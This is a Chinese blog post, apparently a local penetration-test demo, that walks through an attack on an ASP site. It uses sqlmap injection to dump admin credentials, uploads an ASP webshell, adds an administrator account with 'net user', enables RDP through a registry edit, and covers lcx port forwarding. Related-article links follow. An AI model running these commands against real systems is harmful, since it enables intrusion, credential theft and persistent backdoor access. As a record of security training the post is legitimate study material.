漏洞本地演示0x1

最新推荐文章于 2024-08-22 22:20:50 发布
最新推荐文章于 2024-08-22 22:20:50 发布
阅读量776 收藏
点赞数 1
分类专栏: 渗透演练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lzy98/article/details/54581247
版权
       第一次跟项目,有点紧张不知所措,只好一步一步来,希望客户能够满意。。。
白小小说要有完全的流程,在下的本意是注入》getshell》提权远程访问。
下面是流程。
================没什么用但是为了美观的分割线==================

扫描发现存在SQL注入漏洞

漏洞本地演示0x1

注入点:http://localhost/CompHonorBig.asp?id=37 可能存在sql注入漏洞 

==========================================================================================

1.sqlmap中进行注入查询

漏洞本地演示0x1

(1)

通过命令 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”--tables #查询表名

存在以下表名

漏洞本地演示0x1

(2)

猜测管理员账号密码在admin表中

通过命令 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”-D admin --columns#查询admin表中列名

漏洞本地演示0x1

(3)

继续查询管理员账号密码 sqlmap.py -u “http://localhost/compHonorBig.asp?id=37”-D admin -C username,password --dump #查询管理员账号密码

      查询结果

漏洞本地演示0x1


 ===================================================================

   2.上传shell

     (1)找到后台地址 http://localhost/admin/login.asp

     进入后台

漏洞本地演示0x1

 

(2)

   添加运行上传文件类型asp

漏洞本地演示0x1

 (3)

   找到一个上传点

漏洞本地演示0x1

 

(4)

   尝试上传asp木马

漏洞本地演示0x1

 

 (5)

   上传成功

漏洞本地演示0x1

==================================================================

   3.webshell中提权管理

    (1)     

    访问wenshell地址 http://localhost/UploadFiles/20161226122028978.asp

                                  输入密码 heroes 进入

漏洞本地演示0x1

(2)

      

whoami查看发现是system权限,没有安装防护软件

直接cmd命令下添加用户

  命令为:/c net user lzyh lzyh /add & net localgroup administrators lzyh /add

漏洞本地演示0x1

 

成功

     (3)

   查看开放端口

漏洞本地演示0x1

可以看到3389端口是关闭的

   需要手动开启

   开启3389

    命令为:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3389是远程连接段口,开启即可远程连接

漏洞本地演示0x1
          查看是否成功打开3389

漏洞本地演示0x1

=============================================================================================

  4.lcx端口转发

   1

    本机先开启lcx转发

漏洞本地演示0x1

2

   webshell 上传lcx.exeuploadfile目录下

   执行cmd命令

漏洞本地演示0x1

 3

   在进行登录访问

漏洞本地演示0x1

 

4

     输入刚才添加的用户

    进入到服务器

漏洞本地演示0x1

tips:一般来说能直接访问到目标就不用转发,要转发先转发到公网在连接上去

     转发端口作用是将内网数据转发到公网,让局域网和广域网能够访问到内容数据并且利于黑客隐藏自己踪迹。

=========================其实在cmd命令下查看ip,可以看到如下===============================

漏洞本地演示0x1

mstsc直接访问 192.168.74.128

即可进入 无须lcx端口转发

漏洞本地演示0x1



其实是不需要lcx转发的,白小小说客户一定要看到lcx转发,无奈我又没有公网服务器,只好假设虚拟机连接。

 

浪子燕青啦啦啦
关注
专栏目录
[漏洞挖掘与防护] 03.漏洞利用之WinRAR安全缺陷复现(CVE-2018-20250)及软件自启动分析
杨秀璋的专栏
08-26 360
上一篇文章将详细介绍MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。这篇文章将详细讲解WinRAR漏洞(CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。基础性文章,希望对入门的同学有帮助。
漏洞挖掘】——119、HTTP头部注入介绍
Fly_鹏程万里
06-27 221
User-Agent:使得服务器能够识别客户使用的操作系统,游览器版本(很多数据量大的网站中会记录客户使用的操作系统或浏览器版本等存入数据中)Cookie:网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP])Clien-IP:同上。
漏洞演示系统DVWA渗透测试攻略
07-15
漏洞演示系统DVWA(Damn Vulnerable Web Application) V1.8渗透测试攻略。
XSS漏洞演示
MyDriverC
12-16 845
http://www.2cto.com/Article/201205/131624.html 先扫描目标存在漏洞。扫出了好多XSS 随便找一个测试下,弹窗出来了,可以利用 把我们的利用代码转码,以免被浏览器安全策略过滤。 复制转码后的代码,和漏洞地址合一块,生成一个URL。 访问URL,自动跳转到我的服务器内攻击页面。
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞攻击全程演示(图解)
Web安全漏洞的靶场演示
m0re's blog
08-15 1万+
命令执行漏洞 一般查看home目录,挖掘用户信息:ls -alh /home 查看具体用户的目录:ls -alh /home/用户名/ 查看系统信息:uname -a 利用ssh命令执行root权限命令 使用ssh 用户名@localhost通过ssh登录服务器是不需要身份验证的; 比如查看bill用户sudo命令的权限:ssh bill@localhost sudo -l ubuntu自带防火墙,所以关闭防火墙方便后面的操作。 ssh bill@localhost sudo ufw disable 反弹
2018年3月最新的Ubuntu 16.04.4漏洞提权代码
热门推荐
神棍之路
03-19 6万+
2018年3月最新的Ubuntu 16.04.4漏洞提权代码,本代码取自Vitaly Nikolenko的推子 亲测阿里云提权可用。 /* * Ubuntu 16.04.4 kernel priv esc * * all credits to @bleidl * - vnik */ // Tested on: // 4.4.0-116-generic #140-Ubuntu S...
SQL注入漏洞,常用注入函数及其pakachu漏洞靶场演示
ytdd66的博客
03-04 1425
SQL:是操作数据库数据的结构化的查询语言,实现对网页应用数据和后台数据库的交互。SQL注入是将表单域或数据包输入的参数,拼接成的SQL语句,传递给Web服务器,进而传给数据库服务器并得到执行,达到获取数据库信息的目的。如果Web应用程序的开发人员对用户输入的数据或Cookie等内容未过滤或者验证就直接传给数据库,就可能导致恶意的SQL语句被执行,进而获取数据库的信息,造成SQL注入攻击。
0x03 ShowDoc 文件上传漏洞(CNVD-2020-26585)复现
最新发布
weixin_43263566的博客
08-22 1099
如果能成功访问就说明有可能存在漏洞,是否存在漏洞还需要后续进行上传测试。首先你可以编写个搜索fofa的脚本,用来收集目标ip。然后就可以编写ip验证脚本。
Red Team后漏洞利用秘籍:如何使用C#语言实现系统调用
systemino的博客
05-21 742
0x00 前言 在过去的一年中,安全社区(特别是红方运营团队和蓝方防御团队)持续关注Windows恶意软件如何实现后漏洞利用活动,以及如何绕过终端检测与响应(EDR)设备。 现在,对于某些防御人员来说,这种技术的使用还是比较陌生的,但对于攻击者来说却并非如此。许多年来,很多恶意软件作者、开发人员甚至是游戏破解者都在尝试利用系统调用和内存加载。其最初目标是绕过某些通过反病毒和反作弊引擎之类的工具来实现的限制和安全措施。 在一些文章中,已经介绍过如何...
thinkcmfx漏洞太大_thinkcmf漏洞集合
weixin_39765695的博客
12-22 622
thinkcmf漏洞集合在先知逛的时候看到的的,后面发现是thinkcmf 翻了一下自己的漏洞库对比了一下版本发现,泡泡大佬这里看的是1.6版本的,而官方最后的版本 2.2.3 所以做一下漏洞补充。注:thinkcmf 并没有死,他拥有两个版本一个是 thinkcmf5 一个是 thnkcmf2.2.3 但是这两个版本都有漏洞,因为现在thinkcmf2.2.3使用的人越来越少了,所以爆出来,至于...
关于本地提权的学习笔记(二):注入进程和利用漏洞提权
Mi1k7ea
02-26 3738
本文为学习笔记,很多不足之处望各位指导一下~ 注入进程提权: 该方式在实现提权的同时给系统安放了后门,以便于进行隐蔽的监听。 下载pinjector.exe程序: https://www.tarasco.org/security/Process_Injector/ 然后将该程序放入system32目录中,在命令行中输入pinjector,提示有-l和-p两个参数,先输入pinje
BWAPP:一款非常好用的漏洞演示平台
公众号shadow sock7
06-14 5197
参考: http://www.freebuf.com/sectool/76885.html https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
[TOP10]十大渗透测试演练系统
ropin_os的专栏
09-18 4744
本文总结了目前网络上比较流行的渗透测试演练系统,这些系统里面都提供了一些实际的安全漏洞,排名不分先后,各位安全测试人员可以亲身实践如何利用这个漏洞,同时也可以学习到漏洞的相关知识。 DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的
利用本地包含漏洞执行任意代码
cnbird's blog
01-19 2万+
1 概述   文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。 本地包含漏洞是PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web
渗透测试之CSRF
黑面狐
01-08 5460
CSRF是跨站伪造请求,常见攻击手段发送csrf的连接,通过伪造请求从而受害者点击后会利用受害者的身份发起这个请求。例如新增一个账号,修改用户密码等等。 CSRF攻击成功有两个必须的条件。1.被伪造身份的目标曾在该浏览器上访问过CSRF站点,且cookies尚未过期。2.目标被引诱在该浏览器上访问了我们放置恶意代码的域名或网站。 接下来我们用bwapp演示CSRF。 例子一:第一个例子是利用
一加手机刷机 Kali Nethunter
浪子燕青的博客
07-17 2万+
可以说刷是一定可以刷成功的,但是在刷的途中会遇到不少坑,我也是踏了一些坑其中有一次把手机刷成了黑砖,开机都没反应后来还是救活了。 我对黑手的概念:One puls移动手机 + TL-Wn722N无线网卡 + 一根普通的OTG转换线,重新刷CM12.1系统作为容器之后刷入Nethunter3.0内核就成了所谓的"黑手"。 我用的一加手机 第一步 下载一加工具包 【下载地址:h
BurpSuite修改返回数据
浪子燕青的博客
02-23 7175
BurpSuite修改返回数据 再拦截页面的设置选项中勾选拦截服务段数据 ] 访问博客 拦截页面右键选择拦截返回消息 然后forward发送 这里是服务返回的数据,还没有传递到浏览器,可以在这里修改数据 然后在此forward发送 这里的数据就修改好了 顺便提一点burp怎么设置拦截名单,比如不拦截google,firefox站点请求 在这里设置即可 firefox\.com$ firefox\.com\.cn$ mozilla\.com$ mozilla\.net$ mozilla\.org$
上传漏洞 Upload-Labs实战
浪子燕青的博客
02-25 5594
上传漏洞 Upload-Labs-1 Upload-labs是国内一个老哥c0ny1开源的上传漏洞靶子,下载地址 https://github.com/c0ny1/upload-labs 与sqli-labs有些类似,主要专注于上传漏洞这一块。 为了方便下载,已经保存到当前服务器下 下载地址 环境搭建 默认下载PHP+Mysql即可,如果之前有搭建过sqli-labs的话,直接把项目放在www目录下即可。 然后打开,这个时候网页会提示undefined index。。。。,这其实不是异常,而是PHP的提示
STM32L0x1超低功耗微控制器参考手册
"该资源是STM32L0x1系列超低功耗微控制器的中文参考手册,详细介绍了如何使用STM32L0x1的内存和外围设备。手册适用于应用开发人员,并提到了相关文档如Cortex-M0+技术参考手册和STM32L0x1的数据表。" 在STM32L0x1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

浪子燕青啦啦啦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值